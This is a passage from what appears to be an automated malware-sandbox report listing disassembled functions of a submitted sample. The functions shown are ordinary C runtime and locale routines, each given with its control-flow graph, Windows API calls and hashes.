                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                  • String ID: U8i
                                                                                                  • API String ID: 2081738530-3066515534
                                                                                                  • Opcode ID: 8f1f539c94fbce10ade97b05dcd7ee0ebd37b6e23e0caa64ac7e474399da85aa
                                                                                                  • Instruction ID: 4cde4c7b37da8fb877f5a308439bc45115566dcf24b10913bc152dd52c998b4f
                                                                                                  • Opcode Fuzzy Hash: 8f1f539c94fbce10ade97b05dcd7ee0ebd37b6e23e0caa64ac7e474399da85aa
                                                                                                  • Instruction Fuzzy Hash: 0341AF72D00A199FDB54EF94D841AAEB7B6FF08720F148299E81A67351E770BE40CB90
                                                                                                  Function 00686C7E Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74COMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 870 686c7e-686c8a 871 686d1c-686d1f 870->871 872 686c8f-686ca0 871->872 873 686d25 871->873 875 686cad-686cc6 LoadLibraryExW 872->875 876 686ca2-686ca5 872->876 874 686d27-686d2b 873->874 879 686cc8-686cd1 GetLastError 875->879 880 686d2c-686d3c 875->880 877 686cab 876->877 878 686d45-686d47 876->878 882 686d19 877->882 878->874 883 686d0a-686d17 879->883 884 686cd3-686ce5 call 684768 879->884 880->878 881 686d3e-686d3f FreeLibrary 880->881 881->878 882->871 883->882 884->883 887 686ce7-686cf9 call 684768 884->887 887->883 890 686cfb-686d08 LoadLibraryExW 887->890 890->880 890->883
                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,8DFC4D89,?,EBD99D41,?,00686D8D,0067D8B6,?,00000000,8DFC4D89), ref: 00686D3F
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeLibrary
                                                                                                  • String ID: api-ms-$ext-ms-$tg
                                                                                                  • API String ID: 3664257935-3900055408
                                                                                                  • Opcode ID: 279e27fe39a7ed46bb1d241061504a1d32989436ad836f6c397b407e806100f9
                                                                                                  • Instruction ID: fc709c3ac5b6f33d5bb95adbf71a205f245de5c2130c96db19cdead8a15089c8
                                                                                                  • Opcode Fuzzy Hash: 279e27fe39a7ed46bb1d241061504a1d32989436ad836f6c397b407e806100f9
                                                                                                  • Instruction Fuzzy Hash: 2321E472B01215ABDB31BB60EC40A9A776BAF42765F251311FA06A7391DB70ED01CBE0
                                                                                                  Function 0067809D Relevance: 12.2, APIs: 8, Instructions: 175COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 891 67809d-6780b5 892 6780b7-6780c7 call 6812d1 891->892 893 6780cb-6780f3 MultiByteToWideChar 891->893 892->893 904 6780c9 892->904 895 678257-678268 call 678287 893->895 896 6780f9-678105 893->896 897 678247 896->897 898 67810b-678110 896->898 903 67824b 897->903 901 678125-678130 call 67ed0b 898->901 902 678112-67811b call 678860 898->902 913 67813b-678140 901->913 914 678132 901->914 912 67811d-678123 902->912 902->913 908 67824d-678255 call 678084 903->908 904->893 908->895 916 678138 912->916 913->903 917 678146-678159 MultiByteToWideChar 913->917 914->916 916->913 917->903 918 67815f-678178 LCMapStringEx 917->918 918->903 919 67817e-678186 918->919 920 6781b8-6781c4 919->920 921 678188-67818d 919->921 922 6781c6-6781c8 920->922 923 678239 920->923 921->908 924 678193-678195 921->924 926 6781dd-6781e8 call 67ed0b 922->926 927 6781ca-6781d3 call 678860 922->927 928 67823d-678245 call 678084 923->928 924->908 925 67819b-6781b3 LCMapStringEx 924->925 925->908 936 6781f3-6781f8 926->936 937 6781ea 926->937 935 6781d5-6781db 927->935 927->936 928->908 938 6781f0 935->938 936->928 939 6781fa-678214 LCMapStringEx 936->939 937->938 938->936 939->928 940 678216-67821d 939->940 941 678223-678226 940->941 942 67821f-678221 940->942 943 678229-678237 WideCharToMultiByte 941->943 942->943 943->928
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001,?,00000000,0069BAA9,?,?,bad locale name), ref: 006780E6
                                                                                                  • __alloca_probe_16.LIBCMT ref: 00678112
                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000,?,00000000,0069BAA9,?,?,bad locale name), ref: 00678151
                                                                                                  • LCMapStringEx.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0069BAA9,?,?,bad locale name), ref: 0067816E
                                                                                                  • LCMapStringEx.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000,0069BAA9,?,?,bad locale name), ref: 006781AD
                                                                                                  • __alloca_probe_16.LIBCMT ref: 006781CA
                                                                                                  • LCMapStringEx.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0069BAA9,?,?,bad locale name), ref: 0067820C
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000,?,00000000,0069BAA9,?,?,bad locale name), ref: 0067822F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                  • String ID:
                                                                                                  • API String ID: 2040435927-0
                                                                                                  • Opcode ID: 18eebc1bc02c82c0fdba7616b1fe20ffd5c32d88d902009206effbacdf0833d5
                                                                                                  • Instruction ID: 7cc27df75fdf96bb3106fbd510550c634d69918544e1e64dd67fa0514686bc2a
                                                                                                  • Opcode Fuzzy Hash: 18eebc1bc02c82c0fdba7616b1fe20ffd5c32d88d902009206effbacdf0833d5
                                                                                                  • Instruction Fuzzy Hash: 6D51B372540606AFDB209F60CC49FEB7BAAEF44741F158029F919E7251DF348D12CBA0
                                                                                                  Function 00684A48 Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 944 684a48-684a59 945 684a5b 944->945 946 684a5d-684a68 944->946 945->946 947 684a6a-684a87 call 67eb76 946->947 948 684a8c-684a9f 946->948 960 684d71-684d74 947->960 950 684aa1-684ac1 call 684d75 948->950 951 684af4-684af7 948->951 962 684acb-684ad7 call 6930a0 950->962 963 684ac3-684ac6 950->963 952 684af9 951->952 953 684b03-684b34 951->953 956 684afb-684afd 952->956 957 684aff-684b02 952->957 958 684b54 953->958 959 684b36-684b44 953->959 956->953 956->957 957->953 966 684b57-684b5c 958->966 964 684b4b-684b52 959->964 965 684b46-684b49 959->965 976 684add-684aef 962->976 977 684d6e 962->977 967 684d70 963->967 964->966 965->966 969 684b5e-684b60 966->969 970 684b62-684b69 966->970 967->960 971 684b85-684b92 969->971 972 684b78-684b83 970->972 973 684b6b-684b75 call 67e720 970->973 978 684b9d-684bad 971->978 979 684b94-684b97 971->979 972->971 973->972 976->977 977->967 982 684bb0-684bc0 978->982 979->978 981 684c5c-684c5e 979->981 985 684c70-684c76 981->985 986 684c60-684c6e call 679d00 981->986 983 684c12-684c27 call 685288 982->983 984 684bc2-684be6 call 692e80 982->984 983->985 996 684c29-684c2f 983->996 998 684be8 984->998 999 684beb-684c0e 984->999 988 684c78 985->988 989 684c7a-684ca5 call 692e80 985->989 986->985 988->989 1001 684cb1-684cba 989->1001 1002 684ca7 989->1002 1000 684c32-684c37 996->1000 998->999 999->982 1003 684c10 999->1003 1004 684c39-684c3c 1000->1004 1005 684c3e-684c41 1000->1005 1008 684cbb-684cc7 1001->1008 1006 684ca9-684cab 1002->1006 1007 684cad-684caf 1002->1007 1003->981 1004->1005 1009 684c43-684c49 1004->1009 1005->1000 1006->1001 1006->1007 1007->1008 1010 684ccd-684cd2 1008->1010 1011 684d63-684d6a 1008->1011 1012 684c59 1009->1012 1013 684c4b-684c4e 1009->1013 1014 684cd8-684d04 call 692ea0 call 692f50 1010->1014 1015 684cd4-684cd6 1010->1015 1011->977 1012->981 1016 684c50 1013->1016 1017 684c53-684c57 1013->1017 1018 684d06-684d08 1014->1018 1023 684d11-684d36 call 692ea0 call 692f50 1014->1023 1015->1014 1015->1018 1016->1017 1017->981 1018->1011 1020 684d0a 1018->1020 1022 684d0c-684d0f 1020->1022 1020->1023 1022->1023 1025 684d38-684d3a 1022->1025 1023->1025 1032 684d43-684d61 call 692ea0 call 692f50 1023->1032 1025->1011 1029 684d3c 1025->1029 1031 684d3e-684d41 1029->1031 1029->1032 1031->1011 1031->1032 1032->1011
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _strrchr
                                                                                                  • String ID:
                                                                                                  • API String ID: 3213747228-0
                                                                                                  • Opcode ID: 4a1e7a88781f3fc4a05ea266e86924434fd1885396d90a927bf9f7f5f6868df7
                                                                                                  • Instruction ID: 76f5f08fa42b4e2f96744690daf28ad15206d84e96f5c6a48ee5325762a65175
                                                                                                  • Opcode Fuzzy Hash: 4a1e7a88781f3fc4a05ea266e86924434fd1885396d90a927bf9f7f5f6868df7
                                                                                                  • Instruction Fuzzy Hash: F1B16832A01257AFDB25AF64CC81BEE7BABEF55310F144255E514AF382DB74D901C7A0
                                                                                                  Function 00671BC0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 162COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1038 671bc0-671c00 1039 671c06-671c09 1038->1039 1040 671d5e-671d76 1038->1040 1039->1040 1041 671c0f-671c2b call 67829a 1039->1041 1044 671c2d-671c32 1041->1044 1045 671c39 1041->1045 1046 671c34-671c37 1044->1046 1047 671c3e-671c84 call 6761c5 1044->1047 1045->1047 1046->1047 1050 671d77-671da5 call 67638c call 677be3 1047->1050 1051 671c8a-671cd1 call 676616 call 677b78 call 676661 1047->1051 1062 671cd3-671cd9 call 67e8b9 1051->1062 1063 671cdc-671ce8 1051->1063 1062->1063 1064 671cf3-671cff 1063->1064 1065 671cea-671cf0 call 67e8b9 1063->1065 1068 671d01-671d07 call 67e8b9 1064->1068 1069 671d0a-671d16 1064->1069 1065->1064 1068->1069 1073 671d21-671d2d 1069->1073 1074 671d18-671d1e call 67e8b9 1069->1074 1077 671d2f-671d35 call 67e8b9 1073->1077 1078 671d38-671d44 1073->1078 1074->1073 1077->1078 1079 671d46-671d4c call 67e8b9 1078->1079 1080 671d4f-671d59 call 67621d 1078->1080 1079->1080 1080->1040
                                                                                                  APIs
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00671C43
                                                                                                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00671C8F
                                                                                                  • __Getctype.LIBCPMT ref: 00671CA8
                                                                                                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00671CC4
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00671D59
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: std::_$Locinfo::_Lockit$GetctypeLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                  • String ID: bad locale name
                                                                                                  • API String ID: 1840309910-1405518554
                                                                                                  • Opcode ID: 033d2a6aeb030c7dbca79bf922c9e1b859cf1d5630cc322db5eaacef5143098f
                                                                                                  • Instruction ID: 794ce591ec3889a66fc2efa693a06bf3b7a0bacabbc3223280c7aed8203d0705
                                                                                                  • Opcode Fuzzy Hash: 033d2a6aeb030c7dbca79bf922c9e1b859cf1d5630cc322db5eaacef5143098f
                                                                                                  • Instruction Fuzzy Hash: 9A5162B1D002489BEF10DFE8D9457DEBBB9AF15710F148169EC08AB381E775A909CB92
                                                                                                  Function 006746F0 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1486 6746f0-674743 call 6761c5 1489 674745-674754 call 6761c5 1486->1489 1490 674774-674784 1486->1490 1498 674766-67476e call 67621d 1489->1498 1499 674756-674761 1489->1499 1492 674786-67478e 1490->1492 1493 674792-674794 1490->1493 1495 6747f0-674815 call 67621d call 678287 1492->1495 1496 674790 1492->1496 1497 674797-67479b 1493->1497 1496->1497 1501 6747b0-6747b2 1497->1501 1502 67479d-6747a5 call 676512 1497->1502 1498->1490 1499->1498 1501->1495 1503 6747b4-6747b6 1501->1503 1502->1503 1513 6747a7-6747ad 1502->1513 1509 6747bc-6747ce call 671bc0 1503->1509 1510 6747b8-6747ba 1503->1510 1516 674816-67481b call 671880 1509->1516 1517 6747d0-6747ea call 6764e6 1509->1517 1510->1495 1513->1501 1517->1495
                                                                                                  APIs
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00674726
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00674749
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00674769
                                                                                                  • std::_Facet_Register.LIBCPMT ref: 006747DB
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 006747F3
                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00674816
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                                  • String ID:
                                                                                                  • API String ID: 2081738530-0
                                                                                                  • Opcode ID: 42bdb23a76052465410884bc63588e49707a1b4f064ca996919811e428ca577d
                                                                                                  • Instruction ID: 8da18ff2459b6ff486c9317ec0ed0d19f356f33484d7bb11165ec652438b213c
                                                                                                  • Opcode Fuzzy Hash: 42bdb23a76052465410884bc63588e49707a1b4f064ca996919811e428ca577d
                                                                                                  • Instruction Fuzzy Hash: 30419C71D00219DFCB18EF94D845BAEB7B6FB09720F14825DE81967341EB34AA00CB95
                                                                                                  Function 0067B71A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1523 67b71a-67b721 1524 67b726-67b741 GetLastError call 67c923 1523->1524 1525 67b723-67b725 1523->1525 1528 67b743-67b745 1524->1528 1529 67b75a-67b75c 1524->1529 1530 67b7a0-67b7ab SetLastError 1528->1530 1531 67b747-67b758 call 67c95e 1528->1531 1529->1530 1531->1529 1534 67b75e-67b76e call 67ca63 1531->1534 1537 67b782-67b792 call 67c95e 1534->1537 1538 67b770-67b780 call 67c95e 1534->1538 1544 67b798-67b79f call 67e8b9 1537->1544 1538->1537 1543 67b794-67b796 1538->1543 1543->1544 1544->1530
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,?,0067B711,006796EB,00678FED), ref: 0067B728
                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0067B736
                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0067B74F
                                                                                                  • SetLastError.KERNEL32(00000000,0067B711,006796EB,00678FED), ref: 0067B7A1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                  • String ID:
                                                                                                  • API String ID: 3852720340-0
                                                                                                  • Opcode ID: fc005bbfe35b2f0dfea7f05b49fda5e5389f9c5cf2049e2181bb637d7ab48d4f
                                                                                                  • Instruction ID: 7a527035139fe4ecd22e2607eeb13b4d983a748ef416e304a67dd4e93c91add9
                                                                                                  • Opcode Fuzzy Hash: fc005bbfe35b2f0dfea7f05b49fda5e5389f9c5cf2049e2181bb637d7ab48d4f
                                                                                                  • Instruction Fuzzy Hash: E4014C331082115EEBA81B79BC85766275FEB41776320A23FF21CC11E1EF124C115388
                                                                                                  Function 00676824 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1547 676824-67685e call 6787ba call 6761c5 call 671aa0 call 671b70 1556 6768a3-6768b2 call 67621d call 678797 1547->1556 1557 676860-676862 1547->1557 1559 676864-676866 1557->1559 1560 676868-676879 call 676df0 1557->1560 1559->1556 1565 6768b3-6768b8 call 671880 1560->1565 1566 67687b-67689d call 6764e6 1560->1566 1566->1556
                                                                                                  APIs
                                                                                                  • __EH_prolog3.LIBCMT ref: 0067682B
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00676835
                                                                                                    • Part of subcall function 00671AA0: std::_Lockit::_Lockit.LIBCPMT ref: 00671ABD
                                                                                                    • Part of subcall function 00671AA0: std::_Lockit::~_Lockit.LIBCPMT ref: 00671AD9
                                                                                                  • codecvt.LIBCPMT ref: 0067686F
                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00676886
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 006768A6
                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 006768B3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                  • String ID:
                                                                                                  • API String ID: 2133458128-0
                                                                                                  • Opcode ID: 715c63a3ac604d7c5e896c1dc0bea67df5c5e7b5b552f4e5620cf144cc4979b4
                                                                                                  • Instruction ID: 72679b33a9fe2a8e3277437a51816c70224ef2e9e948a91f7df8987b5000189d
                                                                                                  • Opcode Fuzzy Hash: 715c63a3ac604d7c5e896c1dc0bea67df5c5e7b5b552f4e5620cf144cc4979b4
                                                                                                  • Instruction Fuzzy Hash: 2701C4319005158BCB49EFA4C8056FD7B63AF41710F24840EF819AB391DF709E018BA5
                                                                                                  Function 00682289 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,EBD99D41,?,?,00000000,00693ADE,000000FF,?,00682265,00682349,?,00682239,00000000), ref: 006822BE
                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006822D0
                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,00693ADE,000000FF,?,00682265,00682349,?,00682239,00000000), ref: 006822F2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                  • Opcode ID: 56f01e495b8629d8f2439b85ab1b2b74fa773b1fa33db2f3f157a72222e8a0f8
                                                                                                  • Instruction ID: 30357d02753a3eca5812ee74edc0f17569f14bfd85e2a74c7f1d0b55a9a64ca9
                                                                                                  • Opcode Fuzzy Hash: 56f01e495b8629d8f2439b85ab1b2b74fa773b1fa33db2f3f157a72222e8a0f8
                                                                                                  • Instruction Fuzzy Hash: DC016735554615ABDB119F50CC15FEEB7BEFB04711F050627E811E2A90DB749901CB94
                                                                                                  Function 0068A21E Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __alloca_probe_16.LIBCMT ref: 0068A2A3
                                                                                                  • __alloca_probe_16.LIBCMT ref: 0068A36C
                                                                                                  • __freea.LIBCMT ref: 0068A3D3
                                                                                                    • Part of subcall function 00684839: HeapAlloc.KERNEL32(00000000,0068B908,?,?,0068B908,00000220,?,?,?), ref: 0068486B
                                                                                                  • __freea.LIBCMT ref: 0068A3E6
                                                                                                  • __freea.LIBCMT ref: 0068A3F3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1096550386-0
                                                                                                  • Opcode ID: c753c1b5017c5e64a879f0237593d79723ff5b009c88dd4537e0f432712482a9
                                                                                                  • Instruction ID: 1afd8e2d2b3dc9e38c607f40fd135db72e2fdc27c52b19cb2c83faea7e7d4130
                                                                                                  • Opcode Fuzzy Hash: c753c1b5017c5e64a879f0237593d79723ff5b009c88dd4537e0f432712482a9
                                                                                                  • Instruction Fuzzy Hash: 0B51B272610206AFFB207EE4CC85EEB76ABEF44710F29022EFC04D6201EA75DD518762
                                                                                                  Function 00676518 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1483154930.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1483129913.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483188305.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483214354.000000000069F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000000.00000002.1483237199.00000000006A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_670000_Lm9IJ4r9oO.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_SetgloballocaleYarnstd::locale::_
                                                                                                  • String ID:
                                                                                                  • API String ID: 156189095-0
                                                                                                  • Opcode ID: b8fce9f3a134dca40cb7ca1f3c4a5386c67cc68e458ab50270c73be0be0c79bb
                                                                                                  • Instruction ID: 29c4128958215f698e18b038814cae24676a78231c5a499226f639fd0f902d56
                                                                                                  • Opcode Fuzzy Hash: b8fce9f3a134dca40cb7ca1f3c4a5386c67cc68e458ab50270c73be0be0c79bb
                                                                                                  • Instruction Fuzzy Hash: 6401DF75A00A109BDB4AEF20C849ABC7B77BF84340B15800DF81A57381CF346E46CF89
                                                                                                  Function 00672000 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___std_exception_copy.LIBVCRUNTIME ref: 0067209F
                                                                                                    • Part of subcall function 006796FD: RaiseException.KERNEL32(E06D7363,00000001,00000003,0067125C,?,?,?,?,0067125C,?,0069DFCC), ref: 0067975D
                                                                                                  Strings
